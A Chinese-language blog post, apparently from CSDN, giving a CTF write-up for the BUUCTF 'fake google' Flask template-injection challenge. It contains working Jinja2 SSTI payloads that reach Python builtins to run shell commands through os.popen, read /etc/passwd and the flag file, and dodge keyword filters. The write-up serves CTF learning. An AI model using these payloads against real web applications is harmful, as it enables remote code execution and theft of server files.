BUUCTF:[BJDCTF 2nd]fake google-----有总结的py3的payload----py3的SSTI

最新推荐文章于 2023-08-24 11:22:42 发布
最新推荐文章于 2023-08-24 11:22:42 发布
阅读量131 收藏
点赞数
分类专栏: BUUCTF刷题记录 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zero_Adam/article/details/113807763
版权

目录:

注入点好找的很,不多说。
在这里插入图片描述
开头的不了,都会,
问题是找到我们要利用的模块在哪里
这个才是重点。。绕过的还是先不急,
一步一步打好基础,碰到绕过的题的时候再说

一、学会的新东西:

  1. py2,py3都适用的查找模块位置的payload,,(这个真的我吐血弄了半上午才弄出来的。你要是采纳了的话,记得点个赞哦!!!里面还有班长的智慧结晶呢)
  2. 知道了py3的ssti主要是用 这个 warnings.catch_warnings 模块
  3. 然后再是用 builtins 这个东西

二、开始WP

这个是李双鹏班长给的,这个点位巨坑,要不是班长给,我指定找不到,后面这个 i|string ,才显示出来,不然不显示
?ssti={%for i in [].__class__.__base__.__subclasses__()%}{{i|string}}{%endfor%}

在这里插入图片描述

先判断类型

出了之后,再找一下我们要利用的模块就好(我不知道一应该叫什么,先这么叫着吧)

在这里插入图片描述
开头的都是class什么的,说明是python3 写的flask。因为py2写的话,开头的都是type。那就找py3的用法,先找,,,来得及

python3和python2原理都是一样的,只不过环境变化有点大,比如python2下有file而在python3下已经没有了,所以是直接用open。查阅了相关资料发现对于python3的利用主要索引在于 builtins 。那么这个 builtins哪里找呢, 一般就是warnings.catch_warnings 了,也可能有其他的嘛。后来再说吧

三、warnings.catch_warnings模块入手

在这里插入图片描述
上面的是查博客,他们的,我的就不一样,题目的和我的也不一样。。。
如何找到是问题的关键

找到我们要找的模块

在这里插入图片描述
这个 warnings.catch_warnings 可以使用

这个payload可是尝试了好久才尝试出来的哦。。。错了,,不是这个,这个好找得很,,,

?name={{[].__class__.__base__.__subclasses__()[169].__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls').read()")}}
这个就是py2中的那个popen(要执行的命令嘛)一样的操作

这样也行,就是 .__globals__也可以用['globals']来代替,这样有什么好处呢?
当 globals 这个字符串被过滤的时候,就可以用后者的这个方法来进行 绕过,就是这一个:['glo'+'bals']的样式

?name={{[].__class__.__base__.__subclasses__()[169].__init__['__globals__']['__builtins__'].eval("__import__('os').popen('ls').read()")}}

在这里插入图片描述然后看一下根目录:
在这里插入图片描述cat一下就好了啊
在这里插入图片描述不容易啊,查了半天资料,注意:这次是俺没有看WP哦!!!

上面这个的payload参考自这里:

#python3没有file,用的是open
#文件读取
{{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['open']('/etc/passwd').read()}}
{{().__class__.__base__.__subclasses__[177].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("dir").read()')}}
#命令执行
这个通用的命令执行不错,可以打,

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('id').read()") }}{% endif %}{% endfor %}
#文件操作
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('filename', 'r').read() }}{% endif %}{% endfor %}


命令执行,这个是上面那个通用payload的base64升级版,可能 题目会对回显字符有敏感限制
然后base64加密之后显示就更好一点
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag | base64').read()") }}{% endif %}{% endfor %}

来自:安全客这里面还有一些bypass,非常好的一个文章

没有bypass的时候的SSTI还是很简单的,等有了过滤之后再说吧。

四、在尝试另外一个模块

一样的吧,哈哈,这就找到了嘛。

试过之后,发现这个不对,
再找别的payload尝试。就是这样慢慢尝试嘛,怎么可能一下子就找到payload的了呢?
在这里插入图片描述
在这里插入图片描述
这个不找了,,,

Zero_Adam
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BUUCTF SSTI模板注入小结(持续更新)
CN天狼
05-02 1243
BUUCTF部分SSTI模板注入小结 [护网杯 2018]easy_tornado [BJDCTF2020]The mystery of ip [BJDCTF2020]Cookie is so stable [CISCN2019 华东南赛区]Web11 [WesternCTF2018]shrine [GYCTF2020]FlaskApp [CSCCTF 2019 Qual]FlaskLight
SSTI/沙盒逃逸详细总结
devil8123665的博客
03-09 1140
一 flask 1 、基本用法 >>> [].__class__.__base__ <class 'object'> >>> [].__class__.__mro__ (<class 'list'>, <class 'object'>) >>> [].__class__.__bases__ (<class 'object'>,) 2、取子类 [].__class__.__base__.__sub
SSTI模板注入总结
Manuffer的博客
10-13 1万+
文章目录一、初识SSTI二、判断SSTI类型三、常用类1、__class__2、__bases__3、__subclasses__()4、类的知识总结(转载)5、常见过滤器(转载)四、CTF例题[BJDCTF]The mystery of ip[Bugku]Simple_SSTI_1 一、初识SSTI 1、什么是SSTISSTI就是服务器端模板注入(Server-Side Template Injection),实际上也是一种注入漏洞。 可能SSTI对大家而言不是很熟悉,但是相信大家很熟悉SQL注入。实
【网络安全 | 1.5w字总结SSTI漏洞入门,这一篇就够了。
最新发布
等风来
08-24 4886
SSTI(Server-Side Template Injection)是一种服务器端模板注入漏洞,它出现在使用模板引擎的Web应用程序中。模板引擎是一种将动态数据与静态模板结合生成最终输出的工具。然而,如果在构建模板时未正确处理用户输入,就可能导致SSTI漏洞的产生。sql注入的成因是:当后端脚本语言进行数据库查询时,可以构造输入语句来进行拼接,从而实现恶意sql查询。
SSTI简单总结和例题
Aiwin的博客
07-21 2560
SSTI简单总结和例题CISCN 2019华东南]Double Secret和[护网杯 2018]easy_tornado
fake-bpy-module:Fake Blender Python API模块集合以完成代码
05-06
Fake Blender Python API模块集合:fake-bpy-module fake-bpy-module是伪Blender Python API模块的集合,用于在常用IDE中完成代码。 注意:在针对上可以使用Blender Game Engine(BGE)的类似项目。要求fake-bpy-...
fake-gcs-server:Google Cloud Storage模拟器和测试库
02-04
fake-gcs-server为Google Cloud Storage API提供了一个模拟器。 它可以用作Go项目中的库和/或独立的二进制/ Docker映像。 该库位于包中,可以在Go包的测试套件中使用。 该仿真器作为二进制文件提供,可以手动构建...
Impost3r::ghost:Impost3r-一个Linux密码小偷
01-30
Impost3r::ghost:Impost3r-一个Linux密码小偷
fake-08:用于3ds的Pico 8播放器(自制)
02-02
fake-08:用于3ds的Pico 8播放器(自制)
Fake-Page-MikroTik:Flask的假页面MikroTik
05-09
假页面微标记设置确保您已安装python 3.6+。 pip install -r requirements.txt运行服务器$ cd website$ flask run * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)保存用户名和密码用户名和密码存储在...
超详细SSTI模板注入漏洞原理讲解
qq_61955196的博客
08-11 1570
本文指在让第一次接触SSTI注入漏洞的师傅们能更加详细的了解和明白该漏洞的原理
服务器端模板注入(SSTI)详解
键盘的起始页
01-11 1557
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。 模板引擎也会提供沙箱机制来进行漏洞防范,但是可以用沙箱逃逸技术来进行绕过。
SSTI基础学习
qq_63267612的博客
07-10 3680
一、什么是SSTI SSTI就是服务器端模板注入(Server-Side Template Injection),也给出了一个注入的概念。常见的注入有:SQL 注入,XSS 注入,XPATH 注入,XML 注入,代码注入,命令注入等等。SSTI也是注入类的漏洞,其成因其实是可以类比于sql注入的。sql注入是从用户获得一个输入,然后又后端脚本语言进行数据库查询,所以可以利用输入来拼接我们想要的sql语句,当然现在的sql注入防范做得已经很好了,然而随之而来的是更多的漏洞。SSTI也是获取了一个输入,然后再后
SSTI完全学习
热门推荐
Sea_Sand息禅
07-19 2万+
一、什么是SSTI SSTI就是服务器端模板注入(Server-Side Template Injection),也给出了一个注入的概念。 常见的注入有:SQL 注入,XSS 注入,XPATH 注入,XML 注入,代码注入,命令注入等等。sql注入已经出世很多年了,对于sql注入的概念和原理很多人应该是相当清楚了,SSTI也是注入类的漏洞,其成因其实是可以类比于sql注入的。 sql注入是从用户获...
SSTI入门详解
E1even的博客
03-15 4923
关于基于flask的SSTI漏洞的阶段学习小结: SSTI的理解: SSTI和SQL注入原理差不多,都是因为对输入的字符串控制不足,把输入的字符串当成命令执行。 SSTI引发的真正原因: render_template渲染函数的问题 render_template渲染函数是什么: 就是把HTML涉及的页面与用户数据分离开,这样方便展示和管理。当用户输入自己的数据信息,HTML页面可以根据用户自身的信息来展示页面,因此才有了这个函数的使用。 ...
SSTI注入————php的SSTI
wwwwyyyrre的博客
06-04 786
SSTI和SQL注入原理差不多,都是因为对输入的字符串控制不足,把输入的字符串当成命令执行。SSTI利用的是现在的网站模板引擎,主要针对python、php、java的一些网站处理框架SSTI漏洞大致可以分为三种类型————python中的ssti java中的ssti php中的ssti这里不细致介绍模板之类的内容 提供关于ssti注入的题 在题中理解 涉及的内容较多 这里提供一个大佬讲解的ssti的详细内容。
【网络安全】一文带你了解SSTI漏洞(Web_python_template_injection解题详析)
等风来
05-28 5024
以上为SSTI漏洞原理分析并结合攻防世界Web_python_template_injection实例进行解题详解,希望读者躬身实践。我是秋说,我们下次见。
SSTI模板注入
qq_74020399的博客
04-20 718
SSTI就是服务器端模板注入(Server-Side Template Injection),也给出了一个注入的概念。常见的注入有:SQL 注入,XSS 注入,XPATH 注入,XML 注入,代码注入,命令注入等等。sql注入已经出世很多年了,对于sql注入的概念和原理很多人应该是相当清楚了,SSTI也是注入类的漏洞,其成因其实是可以类比于sql注入的。
学习ssti
n1ght的博客
11-23 371
ssti也叫做模板注入 当不正确的使用模板引擎进行渲染时,则会造成模板注入 比如render_template_string函数,当参数可控时,会造成模板注入 在Python的ssti中,大部分是依靠基类->子类->危险函数的方式来利用ssti python沙箱逃逸总结 这是别人的文章 __class__ 返回对象所属的类 __bases__以元组的形式返回一个类所直接继承的类 __base__以字符串返回一个类所直接继承的类。 __mro__返回解析方法调用的顺序。 __su
Unable to locate package ros-notice-turtlebot3-fake
06-12
如果在安装 ROS 虚拟机 `turtlebot3_fake` 包时出现 `Unable to locate package` 错误,可能是因为您的软件源配置不正确或者没有更新。 您可以使用以下命令更新软件源并重新安装 `turtlebot3_fake` 包: ``` sudo ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值